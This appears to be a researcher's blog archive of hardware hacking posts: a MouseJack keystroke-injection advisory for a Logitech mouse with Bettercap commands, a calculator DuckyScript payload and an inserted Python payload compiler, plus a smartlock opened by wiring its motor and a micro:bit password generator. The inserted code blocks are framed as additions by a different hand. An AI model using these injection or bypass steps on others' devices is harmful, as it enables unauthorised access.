David Sopas – Web Security Researcher

Hardware

23/08/19 Hardware, Tools, Travel

My Red Team assessment hardware

Many friends and colleagues have been asking me what I use for red team assessments, so I decided to write a post with my arsenal. It will not necessarily reflect how other Red Teams approach things.

Also, the hardware is task specific. For example, if you’re going on a Wi-Fi hunt you might not need a set of lockpicking tools. Well, you never know 🙂

Other people’s lists can be found here:

Feel free to Tweet @dsopas with new lists or even recommend stuff for me to buy 🙂

22/08/19 Hardware

Pointer hijack and portapack testing

When I was in Casa das Artes, the venue for an event where I would give a talk, I was discussing some RF topics with my pal Zezadas. One of them was playing with RF pointers… I went home the next day and did a small prank: a HackRF replay of a Windows shutdown (works on 7 or 10). Video -> here!

If you want to have real fun with pointers, check out mame82’s LOGITacker research.

BUT, not satisfied with that, I finally got a PortaPack for the “portability” of the HackRF. What should the first video showing off the PortaPack be? My cat’s RF mouse 😀

Video? -> here!

18/03/19 Advisories, Hardware

Popular wireless Logitech mouse vulnerable to keystroke injection

One of the things that keeps me on the security path is the opportunity to learn new things each day.
After seeing the new Bettercap update, which supports HID (Human Interface Device), I decided to read about it, especially about MouseJack keystroke injection attacks.

I went through the affected devices list and didn’t own any of them to test. BUT I had a Logitech M185 wireless mouse, which is very popular because… it’s cheap compared to other models.

I grabbed the CrazyRadio dongle, which had been waiting for better use in my lab, and put it into action.

I opened Bettercap and turned on HID recon:

sudo bettercap -eval="net.recon off;hid.recon on"

After a while I detected my Logitech M185 and also other stuff:

Just to make sure it was really my device, I did a simple hid.sniff ADDR and pressed a few buttons. Don’t want to pop shells anywhere 🙂

Next, I created a simple DuckyScript to open the Windows calculator on the desktop:

GUI r
DELAY 200
STRING calc
DELAY 200
ENTER

What we have so far:

  • Bettercap running with HID module on
  • Detected my Logitech M185 2.4 GHz mouse
  • Created the DuckyScript to use (ducky.txt)

The only thing missing is to inject our payload and see what happens (ADDR is the mouse address found by hid.recon and PT is the keyboard layout to use):

hid.inject ADDR PT ducky.txt
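To make the payload step concrete, here is an added example (not code from this post, and not Bettercap’s own implementation) that compiles a DuckyScript like ducky.txt into the 8-byte USB HID boot-protocol keyboard reports a keystroke injector ultimately has to produce: one press report per key (modifier bits plus a Usage ID) followed by an all-zero release report, with DELAY turned into a timing event. Keycodes are the standard HID Keyboard/Keypad Usage IDs for a US layout, which is an assumption; the Logitech Unifying/nRF24 air frames that Bettercap actually sends are a vendor encoding layered on top of this and are not modelled.

```python
"""Compile DuckyScript into USB HID boot-protocol keyboard reports.

Added example, not code from the post and not Bettercap's implementation:
it shows the translation step every keystroke-injection tool performs on a
payload before framing it for the radio. Keycodes are the USB HID Usage IDs
of the Keyboard/Keypad page, assuming a US layout; the Logitech Unifying
air frames Bettercap emits are a vendor-specific encoding not modelled here.
"""

# Modifier bit flags (byte 0 of the 8-byte keyboard report).
MODIFIERS = {
    "CTRL": 0x01, "CONTROL": 0x01,
    "SHIFT": 0x02,
    "ALT": 0x04,
    "GUI": 0x08, "WINDOWS": 0x08, "COMMAND": 0x08,
}

# Keyboard/Keypad page Usage IDs for the unshifted US-layout keys we need.
KEYCODES = {c: 0x04 + i for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
KEYCODES.update({c: 0x1E + i for i, c in enumerate("1234567890")})  # '1'..'9', '0'=0x27
KEYCODES.update({" ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F, "]": 0x30,
                 "\\": 0x31, ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36,
                 ".": 0x37, "/": 0x38})

# Characters typed as SHIFT + another key on a US layout.
SHIFTED = dict(zip('!@#$%^&*()_+{}|:"~<>?', "1234567890-=[]\\;'`,./"))

# Named keys usable on their own or as the last token of a combo.
NAMED_KEYS = {
    "ENTER": 0x28, "ESC": 0x29, "ESCAPE": 0x29, "BACKSPACE": 0x2A, "TAB": 0x2B,
    "SPACE": 0x2C, "CAPSLOCK": 0x39, "DELETE": 0x4C,
    "RIGHT": 0x4F, "LEFT": 0x50, "DOWN": 0x51, "UP": 0x52,
}

RELEASE = bytes(8)  # all-zero report: every key up


def report(modifiers, keycode):
    """Build one boot-protocol keyboard report: [mods, reserved, key1..key6]."""
    return bytes([modifiers, 0x00, keycode, 0, 0, 0, 0, 0])


def char_to_key(ch):
    """Return (modifier bits, Usage ID) that type one character on a US layout."""
    if ch in KEYCODES:
        return 0x00, KEYCODES[ch]
    if ch.isalpha() and ch.lower() in KEYCODES:
        return MODIFIERS["SHIFT"], KEYCODES[ch.lower()]
    if ch in SHIFTED:
        return MODIFIERS["SHIFT"], KEYCODES[SHIFTED[ch]]
    raise ValueError("no US-layout keycode for %r" % ch)


def compile_ducky(script):
    """Return a list of ("report", bytes) / ("delay", ms) events for a script."""
    events, default_delay = [], 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(arg)
            continue
        if cmd == "DELAY":
            events.append(("delay", int(arg)))
            continue
        if cmd == "STRING":
            # STRING text is typed verbatim, one press/release pair per character.
            for ch in arg:
                mods, keycode = char_to_key(ch)
                events += [("report", report(mods, keycode)), ("report", RELEASE)]
        else:
            # Key combo such as "GUI r" or "CTRL ALT DELETE": every token but the
            # last is a modifier; the last is a named key, a character or a modifier.
            tokens = line.split()
            mods = 0
            for tok in tokens[:-1]:
                mods |= MODIFIERS[tok.upper()]  # KeyError on an unknown modifier
            last = tokens[-1]
            if last.upper() in NAMED_KEYS:
                keycode = NAMED_KEYS[last.upper()]
            elif last.upper() in MODIFIERS:
                mods |= MODIFIERS[last.upper()]
                keycode = 0x00  # modifier pressed alone, e.g. a bare "GUI"
            elif len(last) == 1:
                extra, keycode = char_to_key(last)
                mods |= extra
            else:
                raise ValueError("unknown key %r in line %r" % (last, raw))
            events += [("report", report(mods, keycode)), ("report", RELEASE)]
        if default_delay:
            events.append(("delay", default_delay))
    return events


# The payload from the post (constructed here for the demo): Run dialog, calc, Enter.
CALC_PAYLOAD = """GUI r
DELAY 200
STRING calc
DELAY 200
ENTER
"""

if __name__ == "__main__":
    for kind, value in compile_ducky(CALC_PAYLOAD):
        print(kind, value.hex() if kind == "report" else "%d ms" % value)
```

Running it on the calc payload prints the GUI+r press as `08 00 15 00 00 00 00 00` (LGUI bit set, Usage ID 0x15 for `r`), the release, the 200 ms delay, the four characters of calc, and finally ENTER (0x28). Reviewing this trace before `hid.inject` is a cheap way to confirm a payload types exactly what you intend, which matters when the target is a real desktop rather than a lab VM.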

You can see the end result of this proof-of-concept video – https://www.youtube.com/watch?v=TdPRYWkYarM

Don’t want to be a spoiler but… yeah, it’s vulnerable 🙂

17/10/18 Hardware, IoT

Opening a fingerprint + BLE smartlock – the smart way!

I got my hands on a smartlock that costs around 35€ on Amazon and unlocks with a fingerprint or an app (over BLE).
In reality I don’t know the brand and model, but that is not something I really care about. What I wanted to check was: how hard is it to break this smartlock?

After a quick inspection I noticed that this lock had something covered below the USB port (which is used to charge the battery). Using a sharp knife I scraped the cover off and… a screw appeared 🙂

C’mon… Really? I unscrewed it and started disassembling the device.

I also needed to scrape off some parts, because this lock was supposed to be waterproof so they covered some wires.

In the end, we got a small PCB with a fingerprint sensor connected to it. I didn’t see any spring like in other locks and couldn’t manage to open it by shimming. But I saw a motor connected to the PCB by a white and a yellow wire.

I have already played with some motors and similar devices on Arduino, and they usually only need some power to rotate. In this case, my guess was that connecting the 3.7V battery to the PCB wires would make it rotate (or open).

I grabbed a couple of wires, to avoid soldering or damaging the lock, and connected them to the lock battery. Then I connected the wires to the PCB pads that connect to the motor.

And the lock opened. No fingerprint or BLE needed.

Check out the small video that I did – https://www.youtube.com/watch?v=VEjwV3LsLJ0

So I guess it takes around 5 seconds to open this lock using a direct connection to the motor.
The vendor claims it’s a strong lock… Anyone can break it in 5 seconds.

Screwdrivers rule! 🙂

10/10/18 Hardware

micro:bit password generator

So I got a new toy: a micro:bit. I initially bought three of these devices so I could sniff BLE traffic using btlejack. After playing with it, I decided to learn more about this hardware.

It’s pretty simple to use, especially if you decide to use Microsoft MakeCode, but it also supports MicroPython. I went with the latter and created something that is still in testing because of hardware limitations.

I decided to create a simple password generator. You have two buttons: Button A (left side) and Button B (right side).
Button A “randomly” generates a 4-digit PIN and displays it on the small LEDs. Button B generates a 12-character password consisting of numbers, some letters (some letters don’t display well on the LEDs) and a couple of symbols.
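Here is an added example, in MicroPython-compatible Python, of how the two-button design above can be written. It is not the author’s code (which the post says is still unpublished) and it makes two assumptions that the post does not state: the letter set is a guess at which glyphs stay legible when scrolled on the 5x5 LED matrix, and the randomness source is the OS CSPRNG (secrets) where it exists, falling back to MicroPython’s random module on the board, which is why “randomly” belongs in quotes. The entropy helper is there to make the strength of a 4-digit PIN (about 13 bits) versus the 12-character password (about 60 bits) explicit.

```python
"""Two-button PIN / password generator for the micro:bit (added example).

Not the author's code. Assumptions: LETTERS is a guessed subset that scrolls
legibly on the 5x5 LED matrix; on CPython the choices come from secrets
(OS CSPRNG), on micro:bit MicroPython (no secrets module) from random.choice,
whose quality is the "randomly" caveat the post itself makes.
"""
import math
import random

try:
    from secrets import choice as pick   # CPython: os.urandom-backed
except ImportError:                      # MicroPython on the micro:bit
    pick = random.choice

DIGITS = "0123456789"
LETTERS = "ACEFHJKLNPRTUXYZ"   # assumption: letters that stay readable on 5x5 LEDs
SYMBOLS = "#%+-=?@"
ALPHABET = DIGITS + LETTERS + SYMBOLS


def make_pin(length=4):
    """Button A: a numeric PIN of the given length."""
    return "".join(pick(DIGITS) for _ in range(length))


def make_password(length=12):
    """Button B: a password mixing digits, legible letters and a few symbols.

    Re-draw until every class is present, so the policy stated in the post
    (numbers, some letters and a couple of symbols) actually holds.
    """
    while True:
        pw = "".join(pick(ALPHABET) for _ in range(length))
        if (any(c in DIGITS for c in pw) and any(c in LETTERS for c in pw)
                and any(c in SYMBOLS for c in pw)):
            return pw


def entropy_bits(length, alphabet_size):
    """Strength as log2(alphabet_size ** length); math.log(x)/math.log(2) for MicroPython."""
    return length * (math.log(alphabet_size) / math.log(2))


def run_on_microbit():
    """Event loop for the board: A scrolls a PIN, B scrolls a password."""
    from microbit import button_a, button_b, display, sleep
    while True:
        if button_a.was_pressed():
            display.scroll(make_pin())
        elif button_b.was_pressed():
            display.scroll(make_password())
        sleep(50)


if __name__ == "__main__":
    try:
        import microbit  # noqa: F401  (only importable on the board)
        run_on_microbit()
    except ImportError:
        print("PIN:", make_pin(), "(~%.0f bits)" % entropy_bits(4, len(DIGITS)))
        print("Password:", make_password(),
              "(~%.0f bits)" % entropy_bits(12, len(ALPHABET)))
```

Flashing this to the board with the micro:bit Python editor gives the same two-button behaviour described above; running it on a laptop prints one PIN and one password so the generator logic can be checked without the hardware. Nothing is stored in either case.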

Why did I do this? Well, because you often need something to quickly generate a PIN or a password. Some of my clients NEED this. Nothing is recorded, and if you don’t catch the PIN or password, click to generate another one.

Next step… Battery. Add a CR2032 battery with an on/off switch. Also, improve the code a bit and share it on GitHub.

Check the video here – https://www.youtube.com/watch?v=M3CO_OvSO4w
